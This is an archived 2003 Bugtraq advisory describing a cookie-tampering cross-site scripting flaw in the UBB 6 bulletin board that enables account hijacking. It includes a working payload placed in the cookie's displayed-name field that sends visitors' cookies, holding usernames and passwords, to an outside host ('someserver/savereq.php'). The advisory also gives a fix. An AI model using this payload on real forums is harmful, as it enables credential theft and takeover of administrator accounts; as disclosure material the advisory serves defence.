lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 16 Jul 2003 21:14:25 -0000
From: <anti_acid@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Changing UBB cookie allows account hijack




Application: UBB 6.(?)
Platform: Any system supporting PERL.

Severity: Malicious users can steal session cookies, allowing 
administrative
access to the bulletin board. Also custom html/js insertion in forum page 
is possible.

Author:
antiacid
[anti_acid@...mail.com]

Web:
http://www.infopop.com/products/ubb/

Problem:
The ubber cookie can be manually altered allowing to execute javascript 
in the forum overview page and (latest posts overview page) and steal 
cookies containing username, password and id. This is done by changing 
the [displayed name] attribute and post a new topic on the board in the 
following cookie:

ubber[sessionid]=[username]&[password]&[displayed name]&[daysshown]&
[userid]

with the following code:
username&lt;script&gt;document.write('<img src%
3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0 
height%3D0>')&lt;/script&gt;

When posting a new topic on the forum that topic with your html/js is 
rendered in the forum overview page. The html/js in the [displayed name] 
gets a 0 width 0 height picture from a malicious server sending along the 
ubber cookie contents to the server containing username and password. 
fooling around with html/js in the [displayed name] attribute can cause 
other things like automatic js redirection to logout page, distorting 
forum and inserting custom html content.

Fix.
the [displayed name] attribute should be filtered for any html tags 
before rendering to page.

Feedback.
Please send suggestions, updates, and comments to:
mail : anti_acid@...mail.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ